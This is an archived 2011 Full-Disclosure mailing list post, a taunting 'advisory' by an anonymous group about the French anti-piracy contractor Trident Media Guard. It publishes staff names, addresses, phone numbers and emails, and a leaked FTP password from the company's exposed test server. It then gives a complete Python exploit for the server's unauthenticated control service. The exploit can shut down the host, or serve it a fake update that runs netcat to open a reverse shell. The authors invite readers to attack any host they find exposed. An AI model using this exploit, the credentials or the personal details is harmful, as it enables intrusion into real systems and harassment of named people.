| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 20 May 2011 20:59:38 +0200
From: "cult.of.the.dead.hadopi.tmg cult.of.the.dead.hadopi.tmg"
<cult.of.the.dead.hadopi.tmg@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Too Many Gremlins for Trident MediaGuard (HADOPI)
-- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET --
--==[ CULT OF THE DEAD HADOPI ]==--
Advisory 2
The HADOPI law or Creation and Internet law (French: Loi favorisant la
diffusion et la protection de la création sur Internet, "law
promoting the distribution and protection of creative works on the
internet") is a French law introduced during 2009, attempting to
control and regulate internet access as a means to encourage
compliance with copyright laws. "HADOPI" is the government agency
created by the eponymous law.
http://en.wikipedia.org/wiki/HADOPI_law
In a previous advisory, we exposed the secret plan of the French
government to take over the Internet using a patriotic botnet. A few
days after the strategy was exposed, the piece of software was removed
by Orange. No more Internet by Orange...
Now, the cult of the dead HADOPI is proud to announce his new advisory
(free copy, quote it as much as you want, no tax to be paid):
Too Many Gremlins
for
Trident MediaGuard
After such a big failure at creating a patriotic botnet, the French
government is trying to build a new army with strong and reliable
soldiers: Gremlins.
They subcontracted with a private company called Trident MediaGuard.
This company is as concealed as Bin Laden in the middle of the
Pakistan. It is the long arm of the HADOPI and the French government
for everything related to 3 strikes laws. Note that they recruit
people all over Europe at least. Fear the Gremlins.
But they fucked everything up as DSK.
Who are they?
Trident Media Guard (TMG) is a French company specialized in software
to prevent unauthorized copying of files over the Internet. Founded in
2002 by Alain Guislain and Bastien Casalta, it is located in
Saint-Sébastien-sur-Loire near Nantes.
It aims to "provide services to major publishing companies of the
recording and film industry to stop the loss of revenue due to illegal
downloads on peer-to-peer networks."
http://en.wikipedia.org/wiki/Trident_Media_Guard
http://www.societe.com/societe/trident-media-guar-sa-441392586.html
You have to read to the end to learn how to pwn the Gremlins!
Never expose the Mogwai to bright lights *****************
During a few days around the 14th-15th of may 2011, a "test server"
(according to Too Many Gremlins spokeman) was exposed on the Internet.
It was supposed to be used for R&D only.
This server (91.189.104.82) gave some files revealing what Too Many
Gremlins is filtering, and how they are working.
You can retrieve all the files here: http://pastebin.com/Rc1zGXu0
They should remember it is better to close the door before going into
the bathroom. You never know, a maid could come in.
Never trust 91.189.104.0 - 91.189.111.255 -------------------------------
When you look for information about 91.189.104.82, you discover it belongs to:
$ whois 91.189.104.82
Inetnum: 91.189.104.0 - 91.189.111.255
netname: FARM04
descr: Trident Mediguard
country: FR
org: ORG-TA253-RIPE
admin-c: CB1756-RIPE
tech-c: CB1756-RIPE
person: Casalta Bastien
address: Trident Mediguard
13 rue de la Tour d'Auvergne
44200 Nantes
FR
phone: +33 2 40 12 00 97
fax-no: +33 2 40 35 36 79
e-mail: casalta@...iaguard.info
nic-hdl: CB1756-RIPE
route: 91.189.104.0/21
descr: Trident Mediguard
origin: AS174
mnt-by: COGENT-ROUTE-MNT
Gremlins, especially French ones, are horny and tend to reproduce very
quickly. They need at least a /21!
So, if you don't want gremlins to get you, just ban these IPs. Hmmm
maybe they noticed people already do that. So maybe now they are using
the same tricks every one does to bypass the 3 strikes law: using a
VPN
On a side note, quite funny:
$ host mediaguard.info
mediaguard.info has address 212.53.95.124
mediaguard.info mail is handled by 10 smtp99.nagra.com.
WTF is mediaguard doing with Nagra!
Back to the future -------------------------------
Gremlins can look so nice, so sweat, so kind especially when they
promise to government: Sir, yes Sir, all privacy will be kept
secret. We care about privacy, security, we really do, as long as you
pay us.
But of course, leaks happen, like in 2007 with Media Defender (just
google for "mediadefender email leak")
Then, you could find emails from Bastien Casalta, asking Media
Defender not to block some IP ranges:
From: Bastien Casalta
To: Ben Grodsky
Sent: Thu Aug 30 01:01:56 2007
Subject: IP Blocks
Hello Ben,
- you can ignore the following ip blocks:
82.138.81.0 /24
82.138.88.0 /22
91.189.104.0 /21
130.117.41.0 /24
130.117.115.128 /25
Best,
Bastien
TMG
13, rue de la Loire - Bât D
44230 St Sébastien Sur Loire
Tel 02 40 12 00 97
Fax 02 40 35 36 79
contact_at_tmg.eu
It seems the range where the leak of the so called test server
91.189.104.82 happens already belong to the Gremlins in 2007. Maybe
you also want to ban these ranges too.
BTW, you want to get in touch with Bastien Casalta, use the proper
email: casalta(at)tmg.eu
Gimme money ------------------------------
French politics can be very perv (yes, DSK is not the only one). They
succeed in taking taxes from people and give it to innovative
company. In 2005, Too Many Gremlins get 40.000 Euro from an official
agency supposed to help "innovative companies".
You see, all French are perverse: they pay taxes to get big brothered.
http://www.reseau-entreprendre-atlantique.fr/reseau-entreprendre-atlantique/fr/s04_laureats/s04p03_fiche_laureat.php?laureat=1897
Patents ------------------------------
The gremlins are very possessive. As such, they try to protect their
"precious". And nowadays, you don't have to hide for centuries in a
cave: you patent your idea!
* http://www.faqs.org/patents/app/20090210492
Patent application title: METHOD FOR COMBATTING THE ILLICIT
DISTRIBUTION OF PROTECTED MATERIAL AND COMPUTER SYSTEM FOR CARRYING
OUT SAID METHOD
Inventors: Alain Guislain (St. Sebastien Sur Loire, FR) Bastien
Casalta (Nantes, FR) Soufiane Rouibia (Nantes, FR)
IPC8 Class: AG06F1516FI
USPC Class: 709204
Publication date: 08/20/2009
Patent application number: 20090210492
Abstract:
The invention relates to a method for hindering or preventing the
illegal distribution of protected data in a peer-to-peer network
comprising at least one peer operating an exchange programme
designed for distribution of data to at least one client according
to a selective exchange protocol permitting the peer to operate a
selection of clients to which the data is transferred, said
selection being carried out as a function of one or more
characteristics of the clients. In said method bogus data is sent
to the peer such as to influence the selection of clients served
by the peer, such that the peer is made to favour the transfer to
authorised clients.
* http://www.faqs.org/patents/app/20100036935
Patent application title: METHOD FOR REACTING TO THE BROADCAST OF A
FILE IN A P2P NETWORK
Inventors: Bastien Casalta (Nantes, FR) Soufiane Rouibia (Nantes, FR)
IPC8 Class: AG06F1516FI
USPC Class: 709219
Publication date: 02/11/2010
Patent application number: 20100036935
Abstract:
A method for establishing connections with a number of peers of a
peer to peer network operating using at least one exchange
protocol, such as to influence the broadcast of a file within a
peer to peer network, the addresses of the number of peers being
held by at least one network server. A connection is established
with the network server such as to at least partially download the
addresses of the number of peers connected to the network and
implicated in the downloading of the file, to a control server,
then connections are established between at least one control
client exchanging data with the control server and peers the
addresses of which have been downloaded to the control server,
such as to download content from a peer to a controlled client or
broadcast content from a controlled client to a peer, the
downloading or broadcasting being carried out according to the
exchange protocol.
How to contact them -----------------------------
If you want to get in touch with the Gremlins leaders:
* Alain Guislain, CEO
http://fr.linkedin.com/pub/alain-guislain/1/215/952
* Bastien Casalta, CTO
http://www.linkedin.com/profile/view?id=4004355
* Soufiane Rouibia, R&D manager
http://fr.linkedin.com/pub/soufiane-rouibia/5/684/5b8
Or visit the empty website: http://tmg.eu
Never get it wet *****************
Ok, ok, it was a bit long. But you have to learn what Gremlins are to
understand this evil power. Let us have a look now at what was on that
server.
A list of names --------------------------------
In the server_interface.exe, the Gremlins are spreading. You can find
a list of ... we don't know what yet. You can easily find it everywhere
on the Internet now. Just look for KingElvis, jay@...oo.se and
melon_foli, you will find the list.
Here, we are very disappointed: we can not determine what is this list
for :(
Are these the names of the Gremlins? Or nicks of the humans they ate?
No way to know.
Save your FTP password on the server itself ------------------------
No need to comment here...
91.189.104.82/test/script>> cat cmd_auto_update_cmd_file.txt
share
hFd38+1E
prompt
pasv
mget "script/script_diff2/execute_update.bat"
mget "script/script_diff2/cmd_execute_update_cmd_file.txt"
Oh yes!
Just in case they erase the above file, it is also in
cmd_update_cmd_file.txt.
Remember, the Gremlins are supposed to protect your private data.
Never feed it after midnight *****************
Too Many Gremlins is an innovative company. Let us see how innovative
is the way the develop, and as such the way they protect the private
data they gather.
Among files they shared, one is called server_interface.exe. It is a
Delphi service (welcome in the 90s) listening on TCP/8500.
Advanced features: authentication -----------------------------
As they keep stating, Too Many Gremlins are on the edge of the
technology. The patents show how true it is. Sadly, we could not find
their patent on authentication ... maybe because you do not need to
authenticate!
Anyone can connect to this server and send commands. :)
This is called sharing, isn't-it ?
Advanced feature: protocol design ----------------------------
The protocol is very simple:
- first four bytes must be \x15\x66\x00\x78
- the next byte determines the command:
- \x65: shutdown the computer
- \x66: reboot the computer
- \x70: execute stop_P2P_client.bat
- two next bytes are used as size to get the output of this script
- \x71: execute start_P2P_client.bat
- two next bytes are used as size to get the output of this script
- \x81: execute transfer_set.bat
- next double word is the IP address to download files using FTP
- next word is the port to use
- two next bytes are used as size to get the output of this script
- \x82: execute auto_update.bat
- next double word is the IP address to download files using FTP
- next word is the port to use
- two next bytes are used as size to get the output of this script
As an exercise, you can code the proper Scapy classes. Please, drop
your submissions to http://trac.secdev.org/scapy
Advanced features: pwn the Gremlins --------------------------
Let us have a look at auto_update.bat used by command \x82:
91.189.104.82/test/script>> cat auto_update.bat
@echo off
echo auto_update.bat
echo Transfering files from %1:%2, exiting in 10 sec
if (%1 == "") exit
echo Update cmd file
ftp -s:"C:\script\cmd_auto_update_cmd_file.txt" %1
execute_update.bat %1 %2
echo auto_update.bat completed
I think you have spot the problem :) An attacker can use the "Auto
Update" feature (\x82) to force the server to download updates from an
evil FTP server he controls. Of course, a downloaded file is executed
just after the download...
Hence, anyone who wants to raise an army against Too Many Gremlins,
look for open bar on TCP 8500. Here is the gift to you from the cult
of the dead HADOPI.
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
$> cat Too_Many_Greemlins_exposed_to_the_sunlight.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import sys
import struct
import time
import socket
from threading import Thread
#
# Change this IP to your public IP address.
#
PUBLIC_IP = "192.168.0.1"
#
# Don't forget to open ports 21 and 8501 in your
# OpenOffice.org firewall
#
SRV_PORT = 8500
FTP_PORT = 21
SHELL_PORT = 8501
MAGIC = "\x15\x66\x00\x78"
HALT = "\x65"
REBOOT = "\x66"
STOP = "\x70\x00\x00"
UPDATE = "\x82"
OK = "\x01"
def usage (msg = None):
if msg: print "Error: %s\n" % msg
print "Usage: %s IP command" % sys.argv[0]
print
print "commands:"
print "- halt shutdown the server"
print "- reboot reboot the server"
print "- stop stop P2P clients (eMule and Shareaza)"
print "- pwn use a vulnerability in the Auto Update feature to
get a remote shell"
sys.exit(0)
class fake_ftpd(Thread):
def __init__ (self):
Thread.__init__(self)
self.s = None
f = open('./nc.exe', 'rb')
nc = f.read()
f.close()
batch = "@echo off\r\n"
batch += "move cmd_execute_update_cmd_file.txt nc.exe\r\n"
batch += "nc.exe %s %s -e cmd.exe\r\n" % (PUBLIC_IP, SHELL_PORT)
self.files = {
'script/script_diff2/execute_update.bat': batch,
'script/script_diff2/cmd_execute_update_cmd_file.txt': nc
}
def run (self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s.bind(("", FTP_PORT))
self.s.listen(1)
self.s.listen(0x1337)
print "[+] Waiting for FTP connection..."
conn, addr = self.s.accept()
print "[!] FTP - %s connected!" % addr[0]
conn.send("220 Welcome to my FTPd - Ready to pwn you!\r\n")
while True:
data = conn.recv(1024)
if not data:
break
args = data.rstrip().split(' ')
if data.startswith('CWD'):
conn.send('250 CWD command successful.\r\n')
elif data.startswith('TYPE'):
conn.send('200 TYPE set.\r\n')
elif data.startswith('USER'):
conn.send('331 Password required.\r\n')
username = data.split(' ')[1].rstrip()
elif data.startswith('PASS'):
conn.send('230 User logged in.\r\n')
password = data.split(' ')[1].rstrip()
print "[!] TMG credentials: %s/%s" % (username, password)
elif data.startswith('PORT'):
arg = args[1].split(',')
ip = '.'.join(arg[:4])
port = int(arg[4]) * 256 + int(arg[5])
sdata = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sdata.connect((ip, port))
conn.send('200 PORT command successful.\r\n')
elif data.startswith('RETR'):
conn.send('150 Opening BINARY mode data connection\r\n')
buf = self.files.get(args[1], 'file not found\r\n')
sdata.send(buf)
sdata.close()
conn.send('226 Transfer complete\r\n')
print "[+] File \"%s\" transfered..." % args[1]
elif data.startswith('NLST'):
conn.send('150 Here comes the directory listing.\r\n')
if len(args) == 1:
listing = ''
else:
listing = args[1]
sdata.send(listing + '\r\n')
sdata.close()
conn.send('226 Directory send OK.\r\n')
elif data.startswith('QUIT'):
conn.send('221 Goodbye.\r\n')
break
else:
conn.send('500 Unknown command.\r\n')
conn.close()
def do_stuff (host, cmd):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
try:
print "[+] Connecting to %s:%d..." % (host, SRV_PORT)
s.connect((host, SRV_PORT))
except Exception, e:
print("[?] Error: %s" % e)
s.close()
return ;
print "[+] Sending evil packet..."
if cmd == 'halt':
s.send(MAGIC + HALT)
print "[!] Done!"
elif cmd == 'reboot':
s.send(MAGIC + REBOOT)
print "[!] Done!"
elif cmd == 'stop':
s.send(MAGIC + STOP)
data = s.recv(1)
if data and data[0] == OK:
print "[!] Done!"
else:
print "[!] Error :("
elif cmd == 'pwn':
ftpd = fake_ftpd()
ftpd.daemon = True
ftpd.start()
command = socket.inet_aton(PUBLIC_IP) + struct.pack("h",
socket.ntohs(FTP_PORT)) + "\x00\x00"
s.send(MAGIC + UPDATE + command)
data = s.recv(1)
if data and data[0] == OK:
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s2.bind(("", SHELL_PORT))
s2.listen(1)
conn, addr = s2.accept()
print "[!] SHELL - %s connected!" % addr[0]
print conn.recv(4096)
while True:
cmd = raw_input()
if cmd == "quit" or cmd == "exit":
break;
conn.send(cmd + "\r\n")
data = ""
conn.settimeout(None)
data = conn.recv(1024)
conn.settimeout(1)
while True:
line = ""
try:
line = conn.recv(1024)
except socket.timeout:
break
if line == "":
break
data += line
tab = data.split("\n")
print "\n".join(tab[1:-1])
conn.close()
else:
print "[!] Error :("
s.close()
if __name__ == '__main__':
if len(sys.argv) < 3:
usage("Not enough arguments")
(_, host, cmd) = sys.argv
if cmd not in ['halt', 'reboot', 'stop', 'pwn']:
usage('Invalid command ("%s")' % cmd)
do_stuff(host, cmd)
sys.exit(0)
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Famous last words *****************
Whether or not this was test server, it does not matter. It just show
how reliable Too Many Gremlins can be.
The piece of software is as good as Orange's one described in our
previous advisory. Even a kid could pwn them. Scary.
French evil master plan agency HADOPI stated they are going to inspect
Too Many Gremlins in order to assess if they are secure now. I hope
they also had a look to their codes. Oh no! They can not. Reverse
engineering is mostly illegal in France. So we should just trust the
Gremlins.
Greets ******
N. Sarkozy, Chinese fellows, C. Albanel, F. Mitterrand J-L. Warsmann,
F. Riester, F. Lefebvre, J-L. Masson, J. Myard, M. Thiollière,
M. Marland-Militello
-- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET -- TOP SECRET
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists